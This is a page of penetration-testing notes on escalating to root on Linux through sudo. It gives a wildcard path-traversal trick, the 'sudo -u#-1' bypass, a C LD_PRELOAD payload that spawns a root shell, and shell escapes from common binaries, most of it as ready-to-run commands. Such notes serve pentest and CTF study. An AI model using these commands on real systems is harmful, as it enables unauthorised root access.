📑
Security Notes
  • Readme
  • Resources
    • Useful sites
    • Metasploit
      • Searchsploit
      • Msfvenom
      • Meterpreter
    • Shells
    • Linux
      • Cron
      • Connection
      • Compilers
    • Windows
      • Kernel exploits table
    • Bruteforce
      • Checklist
      • John the Ripper
      • Hashcat
    • BOF
      • Assembly
    • Gaining access checklist
  • Cloud - AWS
    • Enumeration
    • References
    • Bucket S3
      • Public Bucket
      • AMI Files
      • File upload to RCE
    • EC2
      • cloud-init Exploits
      • SSRF To AWS Role compromise
      • Unencrypted EBS
    • IAM
      • Account Disclosure by resource policy
    • Lambda Function
      • Code Injection
      • Attacking APIs
    • VPC
      • Expose Resources
  • Networking
    • Nmap
      • Scan types
    • TCPDump
    • Port forwarding
    • Ports
      • 21 - FTP
      • 22 - SSH
      • 25 465 587 - SMTP
      • 53 - DNS
      • 110 995 - POP3
      • 111 - NFS
      • 113 - Ident
      • 123 - NTP
      • 135 137 139 - RPC
      • 143 993 - IMAP
      • 161 - SNMP
      • 389 - LDAP
      • 139 445 - SMB
      • 873 - Rsync
      • 6379 - Redis
      • 6667 - IRC
  • Linux PrivEsc
    • Checklist
    • Enumeration
      • Important files
      • Memory Dump
    • Privileges Exploitation
    • Wildcard Exploits
    • Sudo Exploits
    • Docker Container
    • Docker Groups
    • Common Exploits
  • Windows PrivEsc
    • Checklist
    • Enumeration
      • Important Files
    • Antivirus evasion tools
    • Unquoted paths
    • Always install elevated
    • Vulnerable services
    • Client side
    • Exploitable privileges
      • Juicy Potato
    • UAC bypass
    • Common Exploits
  • Active Directory
    • Introduction
    • Checklist
    • Enumeration
    • Enable RDP
    • Kerberos
    • Rubeus
    • Credentials harvesting
      • Domain Controller specific
    • Connection
    • Pass The Hash
    • Kerberoast
    • ASREProast
    • Tickets
  • Web Attacks
    • Checklist
    • Enumeration
      • URL bruteforcing
    • APIs and Fields
    • Authentication
    • Filter Evasion
      • Fuzzying and encoding
    • File Vulnerabilities
      • LFI List
      • PHP shells
    • RCE
    • Code Injection
    • Dependency Injection
    • Joomla
    • Wordpress
    • WebDAV
    • HTTP
    • XSS
      • DOM Based
      • Reflected
      • Filter Evasion
    • SSI
    • SSTI
    • RCE
    • CSRF
    • SQL injection
      • sqlmap
      • PostgreSQL
      • Oracle
      • MSSQL
      • MySQL
      • Login
    • XPath injection
    • XXE
    • CORS
  • MOBILE PENTESTING
    • Static Code Analysis
    • Dynamic Code Analysis
    • Network Traffic Analysis
Powered by GitBook
On this page
  • Wildcard redirection
  • Security bypass
  • LD_PRELOAD/LD_LIBRARY_PATH
  • Spawn elevated shell
  • Automated discovery tools
  • Fall Of Sudo
  • SudoKiller
  1. Linux PrivEsc

Sudo Exploits

Wildcard redirection

If a rule inside the sudoers file includes an entry with a wildcard it is possible to redirect the execution to an arbitrary file.

ubuntu ALL= (root) /bin/nano /var/log/*

The wildcard can be used to access any file as follows

sudo nano /var/log/../../etc/passwd

Security bypass

Run the following command to execute a binary as root on Sudo version < 1.8.28

sudo -u#-1 <command>

LD_PRELOAD/LD_LIBRARY_PATH

To exploit this vulnerability one the following strings must be present as a result of sudo -l

env_keep+=LD_PRELOAD
env_keep+=LD_LIBRARY_PATH

To exploit the vulnerability create a simple payload as follows

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
        unsetenv("LD_PRELOAD or LD_LIBRARY_PATH");
        setgid(0);
        setuid(0);
        system("/bin/sh");
}

Compile the payload using GCC

gcc -fPIC -shared -o <output>.so <file>.c -nostartfiles

Invoke sudo with the following parameters to execute the payload as root. The executed sudo command is not important, what really matters is to specify the path to the generated payload

sudo LD_PRELOAD=<path to .so payload> <command>
sudo LD_LIBRARY_PATH=<path to .so payload> <command>

Spawn elevated shell

The following commands allow to spawn an elevated shell from standard commands running with sudo

sudo awk 'BEGIN {system("/bin/sh")}'
sudo find /etc -exec sh -i \;
sudo tcpdump -n -i lo -G1 -w /dev/null -z /bin/sh
sudo tar c a.tar -I /bin/sh a
sudo vim -c '!sh'
ftp>!/bin/sh
less>! <command>

Automated discovery tools

Fall Of Sudo

Python based program that can aid in identifying misconfiurations and vulnerabilities in sudo. Can be found here.

python fallofsudo.py -i

SudoKiller

Tool that allows to identify a wide array of vulnerabilities and potential exploits works in both offline and online mode. Can be found here

Online mode

sudo_killer.sh -cer <filename> -p /<dest folder>
sudo_killer.sh -cer <filename> -p /<dest folder> -s <sudo pass>

Offline mode

Run the following command to generate the offline data set on the target machine. The generate file will be stored under /tmp/sk_offline.txt

extract.sh

Execute the following command to start the offline analysis

sudo_killer.sh -ci /tmp/sk_offline.txt
sudo_killer.sh -ci /tmp/sk_offline.txt -s <sudo pass>
PreviousWildcard ExploitsNextDocker Container

Last updated 1 year ago